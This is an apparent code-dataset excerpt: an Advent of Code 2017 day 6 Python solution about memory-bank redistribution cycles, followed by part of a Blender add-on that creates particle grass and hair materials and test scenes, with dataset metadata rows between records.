| 63.461905 | 449 | 0.602586 | 3,982 | 39,981 | 5.909342 | 0.073832 | 0.062726 | 0.052739 | 0.091794 | 0.898687 | 0.895712 | 0.872424 | 0.842888 | 0.827292 | 0.794399 | 0 | 0.009249 | 0.248193 | 39,981 | 629 | 450 | 63.562798 | 0.773604 | 0.001126 | 0 | 0.726688 | 1 | 0.001608 | 0.208294 | 0.017804 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009646 | 0 | 0.016077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c5874aec87d0b96da1af7a6bb4685758390b2502 | 1,854 | py | Python | day06.py | andreassjoberg/advent-of-code-2017 | cc982f37da5e4c50f076e65dc3b9d074b40facce | [
"MIT"
] | 2 | 2019-02-06T07:48:00.000Z | 2020-04-12T09:53:10.000Z | day06.py | andreassjoberg/advent-of-code-2017 | cc982f37da5e4c50f076e65dc3b9d074b40facce | [
"MIT"
] | null | null | null | day06.py | andreassjoberg/advent-of-code-2017 | cc982f37da5e4c50f076e65dc3b9d074b40facce | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Day 06 of advent of code"""
def exists(array, previous_arrays):
"""Tests if the array has been seen before"""
for i in previous_arrays:
if array == i:
return True
return False
def part_one(data):
"""Part one"""
previous = []
current = map(int, data.split())
cycles = 0
while not exists(current, previous):
cycles += 1
previous.append(current[:])
current_max = max(current)
index = current.index(current_max)
blocks = current[index]
current[index] = 0
for j in range(0, blocks):
spread_index = (index + 1 + j) % len(current)
current[spread_index] = current[spread_index] + 1
return cycles
def part_two(data):
"""Part two"""
previous = []
current = map(int, data.split())
cycles = 0
while not exists(current, previous):
cycles += 1
previous.append(current[:])
current_max = max(current)
index = current.index(current_max)
blocks = current[index]
current[index] = 0
for j in range(0, blocks):
spread_index = (index + 1 + j) % len(current)
current[spread_index] = current[spread_index] + 1
previous = []
cycles = 0
while not exists(current, previous):
cycles += 1
previous.append(current[:])
current_max = max(current)
index = current.index(current_max)
blocks = current[index]
current[index] = 0
for j in range(0, blocks):
spread_index = (index + 1 + j) % len(current)
current[spread_index] = current[spread_index] + 1
return cycles
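The two functions above redistribute blocks identically but re-run the whole search for part two. A one-pass variant (a sketch, not part of the original solution) records the cycle at which each configuration was first seen, so the repeat distance falls out for free:

```python
def redistribution_cycles(data):
    """Return (cycles until first repeat, size of the repeat loop)."""
    banks = list(map(int, data.split()))
    seen = {}  # configuration tuple -> cycle index at first sighting
    cycles = 0
    while tuple(banks) not in seen:
        seen[tuple(banks)] = cycles
        cycles += 1
        # pick the fullest bank (ties broken by lowest index) and spread it
        index = banks.index(max(banks))
        blocks, banks[index] = banks[index], 0
        for j in range(blocks):
            banks[(index + 1 + j) % len(banks)] += 1
    return cycles, cycles - seen[tuple(banks)]
```

On the puzzle's sample input `"0 2 7 0"` this yields `(5, 4)`, matching the published example.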
if __name__ == '__main__':
with open('day06.input', 'r') as f:
INPUT_DATA = f.read()
    print(part_one(INPUT_DATA))
    print(part_two(INPUT_DATA))
| 28.090909 | 61 | 0.578209 | 229 | 1,854 | 4.541485 | 0.257642 | 0.138462 | 0.164423 | 0.138462 | 0.729808 | 0.729808 | 0.729808 | 0.729808 | 0.729808 | 0.729808 | 0 | 0.017028 | 0.303128 | 1,854 | 65 | 62 | 28.523077 | 0.787926 | 0.010787 | 0 | 0.769231 | 0 | 0 | 0.011561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c5cf0f6dd219eaab88ae51f2a37f30b4a88d78ed | 57,146 | py | Python | release/scripts/addons_contrib/object_particle_hair_lab.py | noorbeast/BlenderSource | 65ebecc5108388965678b04b43463b85f6c69c1d | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 2 | 2019-03-20T13:10:46.000Z | 2019-05-15T20:00:31.000Z | engine/2.80/scripts/addons_contrib/object_particle_hair_lab.py | byteinc/Phasor | f7d23a489c2b4bcc3c1961ac955926484ff8b8d9 | [
"Unlicense"
] | null | null | null | engine/2.80/scripts/addons_contrib/object_particle_hair_lab.py | byteinc/Phasor | f7d23a489c2b4bcc3c1961ac955926484ff8b8d9 | [
"Unlicense"
] | null | null | null | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
bl_info = {
"name": "Grass Lab",
"author": "Ondrej Raha(lokhorn), meta-androcto",
"version": (0, 5),
"blender": (2, 75, 0),
"location": "View3D > ToolShelf > Create Tab",
"description": "Creates particle grass with material",
"warning": "",
"wiki_url": "http://wiki.blender.org/index.php/Extensions:2.6/Py/Scripts/Object/Hair_Lab",
"tracker_url": "https://developer.blender.org/maniphest/task/edit/form/2/",
"category": "Object"}
import bpy
from bpy.props import *
# Returns the action we want to take
def getActionToDo(obj):
    if not obj or obj.type != 'MESH':
        return 'NOT_OBJ_DO_NOTHING'
    return 'GENERATE'
# TO DO
"""
class saveSelectionPanel(bpy.types.Panel):
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
bl_label = "Selection Save"
bl_options = {'DEFAULT_CLOSED'}
bl_context = "particlemode"
def draw(self, context):
layout = self.layout
col = layout.column(align=True)
col.operator("save.selection", text="Save Selection 1")
"""
######GRASS########################
class grassLabPanel(bpy.types.Panel):
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
bl_label = "Grass Lab"
bl_context = "objectmode"
bl_options = {'DEFAULT_CLOSED'}
bl_category = "Create"
def draw(self, context):
active_obj = bpy.context.active_object
active_scn = bpy.context.scene.name
layout = self.layout
col = layout.column(align=True)
WhatToDo = getActionToDo(active_obj)
if WhatToDo == "GENERATE":
col.operator("grass.generate_grass", text="Create grass")
col.prop(context.scene, "grass_type")
else:
col.label(text="Select mesh object")
if active_scn == "TestgrassScene":
col.operator("grass.switch_back", text="Switch back to scene")
else:
col.operator("grass.test_scene", text="Create Test Scene")
# TO DO
"""
class saveSelection(bpy.types.Operator):
bl_idname = "save.selection"
bl_label = "Save Selection"
bl_description = "Save selected particles"
bl_register = True
bl_undo = True
def execute(self, context):
return {'FINISHED'}
"""
class testScene1(bpy.types.Operator):
bl_idname = "grass.switch_back"
bl_label = "Switch back to scene"
bl_description = "If you want keep this scene, switch scene in info window"
bl_register = True
bl_undo = True
def execute(self, context):
scene = bpy.context.scene
bpy.data.scenes.remove(scene)
return {'FINISHED'}
class testScene2(bpy.types.Operator):
bl_idname = "grass.test_scene"
bl_label = "Create test scene"
bl_description = "You can switch scene in info panel"
bl_register = True
bl_undo = True
def execute(self, context):
# add new scene
bpy.ops.scene.new(type="NEW")
scene = bpy.context.scene
scene.name = "TestgrassScene"
# render settings
render = scene.render
render.resolution_x = 1920
render.resolution_y = 1080
render.resolution_percentage = 50
# add new world
world = bpy.data.worlds.new("grassWorld")
scene.world = world
world.use_sky_blend = True
world.use_sky_paper = True
world.horizon_color = (0.004393,0.02121,0.050)
world.zenith_color = (0.03335,0.227,0.359)
# add text
bpy.ops.object.text_add(location=(-0.292,0,-0.152), rotation =(1.571,0,0))
text = bpy.context.active_object
text.scale = (0.05,0.05,0.05)
text.data.body = "Grass Lab"
# add material to text
textMaterial = bpy.data.materials.new('textMaterial')
text.data.materials.append(textMaterial)
textMaterial.use_shadeless = True
# add camera
bpy.ops.object.camera_add(location = (0,-1,0),rotation = (1.571,0,0))
cam = bpy.context.active_object.data
cam.lens = 50
cam.display_size = 0.1
# add spot lamp
bpy.ops.object.lamp_add(type="SPOT", location = (-0.7,-0.5,0.3), rotation =(1.223,0,-0.960))
lamp1 = bpy.context.active_object.data
lamp1.name = "Key Light"
lamp1.energy = 1.5
lamp1.distance = 1.5
lamp1.shadow_buffer_soft = 5
lamp1.shadow_buffer_size = 8192
lamp1.shadow_buffer_clip_end = 1.5
lamp1.spot_blend = 0.5
# add spot lamp2
bpy.ops.object.lamp_add(type="SPOT", location = (0.7,-0.6,0.1), rotation =(1.571,0,0.785))
lamp2 = bpy.context.active_object.data
lamp2.name = "Fill Light"
lamp2.color = (0.874,0.874,1)
lamp2.energy = 0.5
lamp2.distance = 1.5
lamp2.shadow_buffer_soft = 5
lamp2.shadow_buffer_size = 4096
lamp2.shadow_buffer_clip_end = 1.5
lamp2.spot_blend = 0.5
# light Rim
"""
# add spot lamp3
bpy.ops.object.lamp_add(type="SPOT", location = (0.191,0.714,0.689), rotation =(0.891,0,2.884))
lamp3 = bpy.context.active_object.data
lamp3.name = "Rim Light"
lamp3.color = (0.194,0.477,1)
lamp3.energy = 3
lamp3.distance = 1.5
lamp3.shadow_buffer_soft = 5
lamp3.shadow_buffer_size = 4096
lamp3.shadow_buffer_clip_end = 1.5
lamp3.spot_blend = 0.5
"""
        # add sphere
bpy.ops.mesh.primitive_uv_sphere_add(size=0.1)
bpy.ops.object.shade_smooth()
return {'FINISHED'}
class Generategrass(bpy.types.Operator):
bl_idname = "grass.generate_grass"
bl_label = "Generate grass"
bl_description = "Create a grass"
bl_register = True
bl_undo = True
def execute(self, context):
# Make variable that is the current .blend file main data blocks
blend_data = context.blend_data
ob = bpy.context.active_object
scene = context.scene
######################################################################
########################Test screen grass########################
if scene.grass_type == '0':
###############Create New Material##################
# add new material
grassMaterial = bpy.data.materials.new('greengrassMat')
ob.data.materials.append(grassMaterial)
#Material settings
grassMaterial.preview_render_type = "HAIR"
grassMaterial.diffuse_color = (0.09710, 0.288, 0.01687)
grassMaterial.specular_color = (0.604, 0.465, 0.136)
grassMaterial.specular_intensity = 0.3
grassMaterial.ambient = 0
grassMaterial.use_cubic = True
grassMaterial.use_transparency = True
grassMaterial.alpha = 0
grassMaterial.use_transparent_shadows = True
#strand
grassMaterial.strand.use_blender_units = True
grassMaterial.strand.root_size = 0.00030
grassMaterial.strand.tip_size = 0.00010
grassMaterial.strand.size_min = 0.7
grassMaterial.strand.width_fade = 0.1
grassMaterial.strand.shape = 0.061
grassMaterial.strand.blend_distance = 0.001
# add texture
grassTex = bpy.data.textures.new("greengrassTex", type='BLEND')
grassTex.use_preview_alpha = True
grassTex.use_color_ramp = True
ramp = grassTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.114,0.375,0.004025,0.38]
rampElements[1].position = 1
rampElements[1].color = [0.267,0.155,0.02687,0]
rampElement1 = rampElements.new(0.111)
rampElement1.color = [0.281,0.598,0.03157,0.65]
rampElement2 = rampElements.new(0.366)
rampElement2.color = [0.119,0.528,0.136,0.87]
rampElement3 = rampElements.new(0.608)
rampElement3.color = [0.247,0.713,0.006472,0.8]
rampElement4 = rampElements.new(0.828)
rampElement4.color = [0.01943,0.163,0.01242,0.64]
# add texture to material
MTex = grassMaterial.texture_slots.add()
MTex.texture = grassTex
MTex.texture_coords = "STRAND"
MTex.use_map_alpha = True
############### Create Particles ##################
# Add new particle system
NumberOfMaterials = 0
for i in ob.data.materials:
NumberOfMaterials +=1
bpy.ops.object.particle_system_add()
#Particle settings setting it up!
grassParticles = bpy.context.object.particle_systems.active
grassParticles.name = "greengrassPar"
grassParticles.settings.type = "HAIR"
grassParticles.settings.use_advanced_hair = True
grassParticles.settings.count = 500
grassParticles.settings.normal_factor = 0.05
grassParticles.settings.factor_random = 0.001
grassParticles.settings.use_dynamic_rotation = True
grassParticles.settings.material = NumberOfMaterials
grassParticles.settings.use_strand_primitive = True
grassParticles.settings.use_hair_bspline = True
grassParticles.settings.render_step = 5
grassParticles.settings.length_random = 0.5
grassParticles.settings.display_step = 5
# children
grassParticles.settings.rendered_child_count = 50
grassParticles.settings.child_type = "INTERPOLATED"
grassParticles.settings.child_length = 0.250
grassParticles.settings.create_long_hair_children = True
grassParticles.settings.clump_shape = 0.074
grassParticles.settings.clump_factor = 0.55
grassParticles.settings.roughness_endpoint = 0.080
grassParticles.settings.roughness_end_shape = 0.80
grassParticles.settings.roughness_2 = 0.043
grassParticles.settings.roughness_2_size = 0.230
######################################################################
###################### Field Grass ########################
if scene.grass_type == '1':
###############Create New Material##################
# add new material
grassMaterial = bpy.data.materials.new('fieldgrassMat')
ob.data.materials.append(grassMaterial)
#Material settings
grassMaterial.preview_render_type = "HAIR"
grassMaterial.diffuse_color = (0.229, 0.800, 0.010)
grassMaterial.specular_color = (0.010, 0.06072, 0.000825)
grassMaterial.specular_intensity = 0.3
grassMaterial.specular_hardness = 100
grassMaterial.use_specular_ramp = True
ramp = grassMaterial.specular_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.0356,0.0652,0.009134,0]
rampElements[1].position = 1
rampElements[1].color = [0.352,0.750,0.231,1]
rampElement1 = rampElements.new(0.255)
rampElement1.color = [0.214,0.342,0.0578,0.31]
rampElement2 = rampElements.new(0.594)
rampElement2.color = [0.096,0.643,0.0861,0.72]
grassMaterial.ambient = 0
grassMaterial.use_cubic = True
grassMaterial.use_transparency = True
grassMaterial.alpha = 0
grassMaterial.use_transparent_shadows = True
#strand
grassMaterial.strand.use_blender_units = True
grassMaterial.strand.root_size = 0.00030
grassMaterial.strand.tip_size = 0.00015
grassMaterial.strand.size_min = 0.450
grassMaterial.strand.width_fade = 0.1
grassMaterial.strand.shape = 0.02
grassMaterial.strand.blend_distance = 0.001
# add texture
grassTex = bpy.data.textures.new("feildgrassTex", type='BLEND')
grassTex.name = "feildgrassTex"
grassTex.use_preview_alpha = True
grassTex.use_color_ramp = True
ramp = grassTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.009721,0.006049,0.003677,0.38]
rampElements[1].position = 1
rampElements[1].color = [0.04231,0.02029,0.01444,0.16]
rampElement1 = rampElements.new(0.111)
rampElement1.color = [0.01467,0.005307,0.00316,0.65]
rampElement2 = rampElements.new(0.366)
rampElement2.color = [0.0272,0.01364,0.01013,0.87]
rampElement3 = rampElements.new(0.608)
rampElement3.color = [0.04445,0.02294,0.01729,0.8]
rampElement4 = rampElements.new(0.828)
rampElement4.color = [0.04092,0.0185,0.01161,0.64]
# add texture to material
MTex = grassMaterial.texture_slots.add()
MTex.texture = grassTex
MTex.texture_coords = "STRAND"
MTex.use_map_alpha = True
###############Create Particles##################
# Add new particle system
NumberOfMaterials = 0
for i in ob.data.materials:
NumberOfMaterials +=1
bpy.ops.object.particle_system_add()
#Particle settings setting it up!
grassParticles = bpy.context.object.particle_systems.active
grassParticles.name = "fieldgrassPar"
grassParticles.settings.type = "HAIR"
grassParticles.settings.use_emit_random = True
grassParticles.settings.use_even_distribution = True
grassParticles.settings.use_advanced_hair = True
grassParticles.settings.count = 2000
#Particle settings Velocity
grassParticles.settings.normal_factor = 0.060
grassParticles.settings.factor_random = 0.045
grassParticles.settings.use_dynamic_rotation = False
grassParticles.settings.brownian_factor = 0.070
grassParticles.settings.damping = 0.160
grassParticles.settings.material = NumberOfMaterials
# strands
grassParticles.settings.use_strand_primitive = True
grassParticles.settings.use_hair_bspline = True
grassParticles.settings.render_step = 7
grassParticles.settings.length_random = 1.0
grassParticles.settings.display_step = 2
# children
grassParticles.settings.child_type = "INTERPOLATED"
grassParticles.settings.child_length = 0.160
grassParticles.settings.create_long_hair_children = False
grassParticles.settings.clump_factor = 0.000
grassParticles.settings.clump_shape = 0.000
grassParticles.settings.roughness_endpoint = 0.000
grassParticles.settings.roughness_end_shape = 1
grassParticles.settings.roughness_2 = 0.200
grassParticles.settings.roughness_2_size = 0.230
######################################################################
########################Short Clumpped grass##########################
elif scene.grass_type == '2':
###############Create New Material##################
# add new material
grassMaterial = bpy.data.materials.new('clumpygrassMat')
ob.data.materials.append(grassMaterial)
#Material settings
grassMaterial.preview_render_type = "HAIR"
grassMaterial.diffuse_color = (0.01504, 0.05222, 0.007724)
grassMaterial.specular_color = (0.02610, 0.196, 0.04444)
grassMaterial.specular_intensity = 0.5
grassMaterial.specular_hardness = 100
grassMaterial.ambient = 0
grassMaterial.use_cubic = True
grassMaterial.use_transparency = True
grassMaterial.alpha = 0
grassMaterial.use_transparent_shadows = True
#strand
grassMaterial.strand.use_blender_units = True
grassMaterial.strand.root_size = 0.000315
grassMaterial.strand.tip_size = 0.00020
grassMaterial.strand.size_min = 0.2
grassMaterial.strand.width_fade = 0.1
grassMaterial.strand.shape = -0.900
grassMaterial.strand.blend_distance = 0.001
# add texture
grassTex = bpy.data.textures.new("clumpygrasstex", type='BLEND')
grassTex.use_preview_alpha = True
grassTex.use_color_ramp = True
ramp = grassTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.004025,0.002732,0.002428,0.38]
rampElements[1].position = 1
rampElements[1].color = [0.141,0.622,0.107,0.2]
rampElement1 = rampElements.new(0.202)
rampElement1.color = [0.01885,0.2177,0.01827,0.65]
rampElement2 = rampElements.new(0.499)
rampElement2.color = [0.114,0.309,0.09822,0.87]
rampElement3 = rampElements.new(0.828)
rampElement3.color = [0.141,0.427,0.117,0.64]
# add texture to material
MTex = grassMaterial.texture_slots.add()
MTex.texture = grassTex
MTex.texture_coords = "STRAND"
MTex.use_map_alpha = True
###############Create Particles##################
# Add new particle system
NumberOfMaterials = 0
for i in ob.data.materials:
NumberOfMaterials +=1
bpy.ops.object.particle_system_add()
#Particle settings setting it up!
grassParticles = bpy.context.object.particle_systems.active
grassParticles.name = "clumpygrass"
grassParticles.settings.type = "HAIR"
grassParticles.settings.use_advanced_hair = True
grassParticles.settings.hair_step = 2
grassParticles.settings.count = 250
grassParticles.settings.normal_factor = 0.0082
grassParticles.settings.tangent_factor = 0.001
grassParticles.settings.tangent_phase = 0.250
grassParticles.settings.factor_random = 0.001
grassParticles.settings.use_dynamic_rotation = True
grassParticles.settings.material = NumberOfMaterials
grassParticles.settings.use_strand_primitive = True
grassParticles.settings.use_hair_bspline = True
grassParticles.settings.render_step = 3
grassParticles.settings.length_random = 0.3
grassParticles.settings.display_step = 3
# children
grassParticles.settings.child_type = "INTERPOLATED"
grassParticles.settings.child_length = 0.667
grassParticles.settings.child_length_threshold = 0.111
grassParticles.settings.rendered_child_count = 200
grassParticles.settings.virtual_parents = 1
grassParticles.settings.clump_factor = 0.425
grassParticles.settings.clump_shape = -0.999
grassParticles.settings.roughness_endpoint = 0.003
grassParticles.settings.roughness_end_shape = 5
return {'FINISHED'}
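Each operator above counts the material slots with a manual loop before assigning the new particle system's `material` slot index. Since that count is just the length of the material list, a hypothetical shared helper (plain Python, no `bpy` dependency, so it is only a sketch of the idea) could replace the repeated loops:

```python
def material_slot_index(materials):
    """1-based slot index of the most recently appended material.

    Equivalent to the manual `for i in ob.data.materials: n += 1` loops
    used in each operator: after appending a material, the new slot's
    1-based index equals the length of the material list.
    """
    return len(materials)
```

Usage would be `grassParticles.settings.material = material_slot_index(ob.data.materials)` immediately after `ob.data.materials.append(...)`.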
####
######### HAIR LAB ##########
####
class HairLabPanel(bpy.types.Panel):
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
bl_label = "Hair Lab"
bl_context = "objectmode"
bl_options = {'DEFAULT_CLOSED'}
bl_category = "Create"
def draw(self, context):
active_obj = bpy.context.active_object
active_scn = bpy.context.scene.name
layout = self.layout
col = layout.column(align=True)
WhatToDo = getActionToDo(active_obj)
if WhatToDo == "GENERATE":
col.operator("hair.generate_hair", text="Create Hair")
col.prop(context.scene, "hair_type")
else:
col.label(text="Select mesh object")
if active_scn == "TestHairScene":
col.operator("hair.switch_back", text="Switch back to scene")
else:
col.operator("hair.test_scene", text="Create Test Scene")
# TO DO
"""
class saveSelection(bpy.types.Operator):
bl_idname = "save.selection"
bl_label = "Save Selection"
bl_description = "Save selected particles"
bl_register = True
bl_undo = True
def execute(self, context):
return {'FINISHED'}
"""
class testScene3(bpy.types.Operator):
bl_idname = "hair.switch_back"
bl_label = "Switch back to scene"
bl_description = "If you want keep this scene, switch scene in info window"
bl_register = True
bl_undo = True
def execute(self, context):
scene = bpy.context.scene
bpy.data.scenes.remove(scene)
return {'FINISHED'}
class testScene4(bpy.types.Operator):
bl_idname = "hair.test_scene"
bl_label = "Create test scene"
bl_description = "You can switch scene in info panel"
bl_register = True
bl_undo = True
def execute(self, context):
# add new scene
bpy.ops.scene.new(type="NEW")
scene = bpy.context.scene
scene.name = "TestHairScene"
# render settings
render = scene.render
render.resolution_x = 1920
render.resolution_y = 1080
render.resolution_percentage = 50
# add new world
world = bpy.data.worlds.new("HairWorld")
scene.world = world
world.use_sky_blend = True
world.use_sky_paper = True
world.horizon_color = (0.004393,0.02121,0.050)
world.zenith_color = (0.03335,0.227,0.359)
# add text
bpy.ops.object.text_add(location=(-0.292,0,-0.152), rotation =(1.571,0,0))
text = bpy.context.active_object
text.scale = (0.05,0.05,0.05)
text.data.body = "Hair Lab"
# add material to text
textMaterial = bpy.data.materials.new('textMaterial')
text.data.materials.append(textMaterial)
textMaterial.use_shadeless = True
# add camera
bpy.ops.object.camera_add(location = (0,-1,0),rotation = (1.571,0,0))
cam = bpy.context.active_object.data
cam.lens = 50
cam.display_size = 0.1
# add spot lamp
bpy.ops.object.lamp_add(type="SPOT", location = (-0.7,-0.5,0.3), rotation =(1.223,0,-0.960))
lamp1 = bpy.context.active_object.data
lamp1.name = "Key Light"
lamp1.energy = 1.5
lamp1.distance = 1.5
lamp1.shadow_buffer_soft = 5
lamp1.shadow_buffer_size = 8192
lamp1.shadow_buffer_clip_end = 1.5
lamp1.spot_blend = 0.5
# add spot lamp2
bpy.ops.object.lamp_add(type="SPOT", location = (0.7,-0.6,0.1), rotation =(1.571,0,0.785))
lamp2 = bpy.context.active_object.data
lamp2.name = "Fill Light"
lamp2.color = (0.874,0.874,1)
lamp2.energy = 0.5
lamp2.distance = 1.5
lamp2.shadow_buffer_soft = 5
lamp2.shadow_buffer_size = 4096
lamp2.shadow_buffer_clip_end = 1.5
lamp2.spot_blend = 0.5
# light Rim
"""
# add spot lamp3
bpy.ops.object.lamp_add(type="SPOT", location = (0.191,0.714,0.689), rotation =(0.891,0,2.884))
lamp3 = bpy.context.active_object.data
lamp3.name = "Rim Light"
lamp3.color = (0.194,0.477,1)
lamp3.energy = 3
lamp3.distance = 1.5
lamp3.shadow_buffer_soft = 5
lamp3.shadow_buffer_size = 4096
lamp3.shadow_buffer_clip_end = 1.5
lamp3.spot_blend = 0.5
"""
# add sphere
bpy.ops.mesh.primitive_uv_sphere_add(size=0.1)
bpy.ops.object.shade_smooth()
return {'FINISHED'}
class GenerateHair(bpy.types.Operator):
bl_idname = "hair.generate_hair"
bl_label = "Generate Hair"
bl_description = "Create a Hair"
bl_register = True
bl_undo = True
def execute(self, context):
# Make variable that is the current .blend file main data blocks
blend_data = context.blend_data
ob = bpy.context.active_object
scene = context.scene
######################################################################
########################Long Red Straight Hair########################
if scene.hair_type == '0':
###############Create New Material##################
# add new material
hairMaterial = bpy.data.materials.new('LongRedStraightHairMat')
ob.data.materials.append(hairMaterial)
#Material settings
hairMaterial.preview_render_type = "HAIR"
hairMaterial.diffuse_color = (0.287, 0.216, 0.04667)
hairMaterial.specular_color = (0.604, 0.465, 0.136)
hairMaterial.specular_intensity = 0.3
hairMaterial.ambient = 0
hairMaterial.use_cubic = True
hairMaterial.use_transparency = True
hairMaterial.alpha = 0
hairMaterial.use_transparent_shadows = True
#strand
hairMaterial.strand.use_blender_units = True
hairMaterial.strand.root_size = 0.00030
hairMaterial.strand.tip_size = 0.00010
hairMaterial.strand.size_min = 0.7
hairMaterial.strand.width_fade = 0.1
hairMaterial.strand.shape = 0.061
hairMaterial.strand.blend_distance = 0.001
# add texture
hairTex = bpy.data.textures.new("LongRedStraightHairTex", type='BLEND')
hairTex.use_preview_alpha = True
hairTex.use_color_ramp = True
ramp = hairTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.114,0.05613,0.004025,0.38]
rampElements[1].position = 1
rampElements[1].color = [0.267,0.155,0.02687,0]
rampElement1 = rampElements.new(0.111)
rampElement1.color = [0.281,0.168,0.03157,0.65]
rampElement2 = rampElements.new(0.366)
rampElement2.color = [0.288,0.135,0.006242,0.87]
rampElement3 = rampElements.new(0.608)
rampElement3.color = [0.247,0.113,0.006472,0.8]
rampElement4 = rampElements.new(0.828)
rampElement4.color = [0.253,0.09919,0.01242,0.64]
# add texture to material
MTex = hairMaterial.texture_slots.add()
MTex.texture = hairTex
MTex.texture_coords = "STRAND"
MTex.use_map_alpha = True
###############Create Particles##################
# Add new particle system
NumberOfMaterials = 0
for i in ob.data.materials:
NumberOfMaterials +=1
bpy.ops.object.particle_system_add()
#Particle settings setting it up!
hairParticles = bpy.context.object.particle_systems.active
hairParticles.name = "LongRedStraightHairPar"
hairParticles.settings.type = "HAIR"
hairParticles.settings.use_advanced_hair = True
hairParticles.settings.count = 500
hairParticles.settings.normal_factor = 0.05
hairParticles.settings.factor_random = 0.001
hairParticles.settings.use_dynamic_rotation = True
hairParticles.settings.material = NumberOfMaterials
hairParticles.settings.use_strand_primitive = True
hairParticles.settings.use_hair_bspline = True
hairParticles.settings.render_step = 5
hairParticles.settings.length_random = 0.5
hairParticles.settings.display_step = 5
# children
hairParticles.settings.child_type = "INTERPOLATED"
hairParticles.settings.create_long_hair_children = True
hairParticles.settings.clump_factor = 0.55
hairParticles.settings.roughness_endpoint = 0.005
hairParticles.settings.roughness_end_shape = 5
hairParticles.settings.roughness_2 = 0.003
hairParticles.settings.roughness_2_size = 0.230
######################################################################
########################Long Brown Curl Hair##########################
if scene.hair_type == '1':
###############Create New Material##################
# add new material
hairMaterial = bpy.data.materials.new('LongBrownCurlHairMat')
ob.data.materials.append(hairMaterial)
#Material settings
hairMaterial.preview_render_type = "HAIR"
hairMaterial.diffuse_color = (0.662, 0.518, 0.458)
hairMaterial.specular_color = (0.351, 0.249, 0.230)
hairMaterial.specular_intensity = 0.3
hairMaterial.specular_hardness = 100
hairMaterial.use_specular_ramp = True
ramp = hairMaterial.specular_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.0356,0.0152,0.009134,0]
rampElements[1].position = 1
rampElements[1].color = [0.352,0.250,0.231,1]
rampElement1 = rampElements.new(0.255)
rampElement1.color = [0.214,0.08244,0.0578,0.31]
rampElement2 = rampElements.new(0.594)
rampElement2.color = [0.296,0.143,0.0861,0.72]
hairMaterial.ambient = 0
hairMaterial.use_cubic = True
hairMaterial.use_transparency = True
hairMaterial.alpha = 0
hairMaterial.use_transparent_shadows = True
#strand
hairMaterial.strand.use_blender_units = True
hairMaterial.strand.root_size = 0.00030
hairMaterial.strand.tip_size = 0.00015
hairMaterial.strand.size_min = 0.450
hairMaterial.strand.width_fade = 0.1
hairMaterial.strand.shape = 0.02
hairMaterial.strand.blend_distance = 0.001
# add texture
hairTex = bpy.data.textures.new("HairTex", type='BLEND')
hairTex.name = "LongBrownCurlHairTex"
hairTex.use_preview_alpha = True
hairTex.use_color_ramp = True
ramp = hairTex.color_ramp
rampElements = ramp.elements
rampElements[0].position = 0
rampElements[0].color = [0.009721,0.006049,0.003677,0.38]
rampElements[1].position = 1
rampElements[1].color = [0.04231,0.02029,0.01444,0.16]
rampElement1 = rampElements.new(0.111)
rampElement1.color = [0.01467,0.005307,0.00316,0.65]
rampElement2 = rampElements.new(0.366)
rampElement2.color = [0.0272,0.01364,0.01013,0.87]
rampElement3 = rampElements.new(0.608)
rampElement3.color = [0.04445,0.02294,0.01729,0.8]
rampElement4 = rampElements.new(0.828)
rampElement4.color = [0.04092,0.0185,0.01161,0.64]
# add texture to material
MTex = hairMaterial.texture_slots.add()
MTex.texture = hairTex
MTex.texture_coords = "STRAND"
MTex.use_map_alpha = True
###############Create Particles##################
# Add new particle system
NumberOfMaterials = 0
for i in ob.data.materials:
NumberOfMaterials +=1
bpy.ops.object.particle_system_add()
#Particle settings setting it up!
hairParticles = bpy.context.object.particle_systems.active
hairParticles.name = "LongBrownCurlHairPar"
hairParticles.settings.type = "HAIR"
hairParticles.settings.use_advanced_hair = True
hairParticles.settings.count = 500
hairParticles.settings.normal_factor = 0.05
hairParticles.settings.factor_random = 0.001
hairParticles.settings.use_dynamic_rotation = True
hairParticles.settings.material = NumberOfMaterials
hairParticles.settings.use_strand_primitive = True
hairParticles.settings.use_hair_bspline = True
hairParticles.settings.render_step = 7
hairParticles.settings.length_random = 0.5
hairParticles.settings.display_step = 5
# children
hairParticles.settings.child_type = "INTERPOLATED"
hairParticles.settings.create_long_hair_children = True
hairParticles.settings.clump_factor = 0.523
hairParticles.settings.clump_shape = 0.383
hairParticles.settings.roughness_endpoint = 0.002
hairParticles.settings.roughness_end_shape = 5
hairParticles.settings.roughness_2 = 0.003
hairParticles.settings.roughness_2_size = 2
hairParticles.settings.kink = "CURL"
hairParticles.settings.kink_amplitude = 0.007597
